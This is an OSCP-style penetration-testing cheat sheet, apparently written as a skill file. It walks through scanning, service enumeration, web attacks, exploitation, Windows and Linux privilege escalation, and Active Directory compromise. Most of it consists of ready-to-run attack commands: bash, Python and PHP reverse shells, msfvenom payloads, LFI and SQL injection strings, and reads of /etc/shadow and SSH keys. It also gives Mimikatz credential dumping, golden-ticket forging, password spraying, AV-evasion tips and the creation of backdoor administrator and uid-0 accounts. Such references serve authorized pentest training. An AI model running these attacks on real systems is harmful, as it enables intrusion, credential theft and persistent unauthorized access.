OSCP Penetration Testing Methodology

Purpose

Execute comprehensive penetration testing engagements following OSCP methodology, covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation phases across Windows, Linux, and Active Directory environments. This skill provides actionable commands and techniques for each phase of a professional penetration test.

Inputs / Prerequisites

Required Tools

• Kali Linux or equivalent attack platform

• Nmap, Gobuster, Nikto for enumeration

• Metasploit Framework, Impacket suite

• Mimikatz, BloodHound, PowerView for AD attacks

• Hashcat, John the Ripper for password cracking

Environment Requirements

• Network access to target systems

• Proper authorization documentation

• Note-taking application for findings

• File transfer capabilities established

Outputs / Deliverables

Primary Outputs

• Complete enumeration findings

• Exploited system access documentation

• Privilege escalation paths identified

• Lateral movement successful demonstrations

Core Workflow

Phase 1: Port Scanning and Enumeration

Initial Scanning

Basic scan with version detection

nmap -sC -sV <IP> -v

Complete scan all ports

nmap -T4 -A -p- <IP> -v

Vulnerability scanning

sudo nmap -sV -p 443 --script "vuln" <IP>

PowerShell port scan

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $)) "TCP port $ is open"}

Phase 2: Service Enumeration

FTP Enumeration (Port 21)

Connect and test anonymous access

ftp <IP>

Try: anonymous / anonymous

Nmap scripts

nmap -p21 --script=ftp-anon,ftp-bounce <IP>

Brute force

hydra -L users.txt -P passwords.txt <IP> ftp

SSH Enumeration (Port 22)

Connect with password

ssh user@IP

Connect with key

chmod 600 id_rsa ssh user@IP -i id_rsa

Crack encrypted key

ssh2john id_rsa > hash john --wordlist=rockyou.txt hash

Brute force

hydra -l user -P passwords.txt <IP> ssh

SMB Enumeration (Port 445)

NetBIOS scan

sudo nbtscan -r 192.168.50.0/24

CrackMapExec enumeration

crackmapexec smb <IP> -u user -p pass --shares crackmapexec smb <IP> -u user -p pass --users crackmapexec smb <IP> -u user -p pass --all

SMBclient

smbclient -L //<IP> smbclient //<IP>/share -U user

Download all files from share

smbclient //<IP>/share -U user

mask "" recurse ON prompt OFF mget *

HTTP/HTTPS Enumeration

Directory discovery

gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/big.txt dirsearch -u http://<IP> -w wordlist.txt

Vulnerability scanning

nikto -h <url>

WordPress

wpscan --url "target" --enumerate vp,u,vt,tt

Drupal

droopescan scan drupal -u http://site

API fuzzing

gobuster dir -u http://<IP>:5002 -w big.txt -p pattern curl -i http://<IP>:5002/users/v1

LDAP Enumeration (Port 389)

Anonymous bind

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=domain,DC=com"

Authenticated

ldapsearch -x -H ldap://<IP> -D 'DOMAIN\user' -w 'pass' -b "CN=Users,DC=domain,DC=com"

windapsearch

python3 windapsearch.py --dc-ip <IP> -u user -p pass --users python3 windapsearch.py --dc-ip <IP> -u user -p pass --da

SNMP Enumeration (Port 161)

snmpcheck -t <IP> -c public snmpwalk -c public -v1 -t 10 <IP>

Phase 3: Web Attacks

Directory Traversal

Linux

http://target/page.php?file=../../../../../etc/passwd

Windows

http://target/page.php?file=../../../../../Windows/System32/drivers/etc/hosts

URL encoded

curl http://<IP>/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Local File Inclusion (LFI)

Log poisoning

http://<IP>/index.php?page=../../../../../var/log/apache2/access.log

Inject PHP in User-Agent, then trigger via log

PHP wrappers

curl "http://<IP>/index.php?page=php://filter/convert.base64-encode/resource=config.php" curl "http://<IP>/index.php?page=data://text/plain,<?php%20system('id');?>"

SQL Injection

-- Authentication bypass admin' or '1'='1 ' or '1'='1'-- " or "1"="1"--

-- Time-based detection ' AND IF (1=1, sleep(3),'false') --

SQLMap Exploitation

Test parameter

sqlmap -u http://<IP>/page.php?id=1 -p id

Dump database

sqlmap -u http://<IP>/page.php?id=1 -p id --dump

OS shell

sqlmap -r request.txt -p item --os-shell --web-root "/var/www/html"

Phase 4: Exploitation

Reverse Shell Payloads

Windows executables

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe

Linux

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Python

python -c 'import socket,os,pty;s=socket.socket();s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

PHP

<?php echo shell_exec('bash -i >& /dev/tcp/<IP>/<PORT> 0>&1');?>

File Transfers

Windows download

powershell -c Invoke-WebRequest -Uri http://<IP>/file -Outfile C:\temp\file certutil -urlcache -split -f "http://<IP>/file" file

Linux download

wget http://<IP>/file curl http://<IP>/file -o output

SMB transfer (Kali to Windows)

impacket-smbserver -smb2support share .

Windows: copy \<IP>\share\file .

Phase 5: Windows Privilege Escalation

Automated Enumeration

Run winPEAS

.\winpeas.exe

PowerUp

Import-Module .\PowerUp.ps1 Invoke-AllChecks

Token Impersonation

PrintSpoofer

PrintSpoofer.exe -i -c powershell.exe

GodPotato

GodPotato.exe -cmd "shell.exe"

JuicyPotatoNG

JuicyPotatoNG.exe -t * -p "shell.exe" -a

Service Exploitation

Unquoted service path

wmic service get name,pathname | findstr /i /v "C:\Windows\" | findstr /i /v """

Check permissions

icacls "C:\path\to\service"

Modify and restart

sc config <service> binpath="C:\path\to\shell.exe" sc start <service>

AlwaysInstallElevated

Check

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Exploit

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > shell.msi msiexec /quiet /qn /i shell.msi

Credential Hunting

PowerShell history

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Search for passwords

findstr /si password *.xml *.ini *.txt *.config

Registry

reg query HKLM /f password /t REG_SZ /s

Saved credentials

cmdkey /list runas /savecred /user:admin C:\shell.exe

Phase 6: Linux Privilege Escalation

TTY Shell Upgrade

python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm

Ctrl+Z, then:

stty raw -echo; fg

Enumeration

LinPEAS

./linpeas.sh

Sudo

sudo -l

SUID

find / -perm -u=s -type f 2>/dev/null

Capabilities

getcap -r / 2>/dev/null

Cron jobs

cat /etc/crontab

Sensitive Files

SSH keys

cat ~/.ssh/id_rsa cat /root/.ssh/id_rsa

Password files

cat /etc/passwd cat /etc/shadow

Phase 7: Active Directory Attacks

Enumeration with PowerView

Import-Module .\PowerView.ps1

Get-NetDomain Get-NetUser | select samaccountname Get-NetGroup Get-NetComputer Find-LocalAdminAccess Get-NetUser -SPN | select samaccountname,serviceprincipalname

BloodHound Collection

SharpHound

Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp

bloodhound-python

bloodhound-python -u 'user' -p 'pass' -ns <DC-IP> -d domain.com -c all

Password Spraying

CrackMapExec

crackmapexec smb <IP> -u users.txt -p 'Password123' -d domain --continue-on-success

Kerbrute

kerbrute passwordspray -d domain.com users.txt "Password123"

AS-REP Roasting

Impacket

impacket-GetNPUsers -dc-ip <DC-IP> domain/user:pass -request

Crack hash

hashcat -m 18200 hash.txt rockyou.txt --force

Kerberoasting

Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.txt

Impacket

impacket-GetUserSPNs -dc-ip <DC-IP> domain/user:pass -request

Crack

hashcat -m 13100 hashes.txt rockyou.txt --force

Lateral Movement

psexec

psexec.py domain/user:pass@<IP> psexec.py -hashes :NTLM_HASH domain/user@<IP>

smbexec

smbexec.py domain/user:pass@<IP>

wmiexec

wmiexec.py domain/user:pass@<IP>

winrs (Windows)

winrs -r:<computer> -u:user -p:pass "cmd"

Mimikatz

privilege::debug sekurlsa::logonpasswords lsadump::sam lsadump::lsa /patch

Golden Ticket

Dump krbtgt hash

lsadump::lsa /inject /name:krbtgt

Create ticket

kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:<HASH> /ptt

Phase 8: Password Cracking

Hashcat

Identify hash type: https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat -m <mode> hash.txt rockyou.txt --force

Common modes

0 = MD5

100 = SHA1

1000 = NTLM

1800 = sha512crypt

13100 = Kerberoast

18200 = AS-REP

John the Ripper

Convert formats

ssh2john id_rsa > hash keepass2john Database.kdbx > hash

Crack

john --wordlist=rockyou.txt hash

Quick Reference

Important Windows Locations

C:/Windows/repair/SAM C:/Windows/System32/config/SAM C:/Windows/Panther/Unattend.xml C:/inetpub/wwwroot/web.config %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Important Linux Locations

/etc/passwd /etc/shadow /etc/crontab /etc/exports ~/.ssh/id_rsa ~/.bash_history /var/www/html/

Adding Users

Windows

net user hacker Password123 /add net localgroup Administrators hacker /add

Linux

useradd -u 0 -g 0 -o -d /root hacker

Constraints and Guardrails

Operational Boundaries

• Operate only within authorized scope

• Document all findings and actions

• Avoid denial of service conditions

• Report critical findings immediately

Technical Limitations

• Some exploits require specific conditions

• AV/EDR may block common tools

• Network segmentation limits lateral movement

• Modern systems have enhanced protections

Troubleshooting

Shell Not Connecting

• Check firewall rules on both ends

• Try alternate ports (443, 80)

• Use encoded payloads to bypass AV

Exploit Not Working

• Verify exact version matches

• Check architecture (x86 vs x64)

• Test in isolated environment first

No Privilege Escalation Path

• Run multiple enumeration scripts

• Check manual techniques

• Look for credential reuse

• Consider kernel exploits as last resort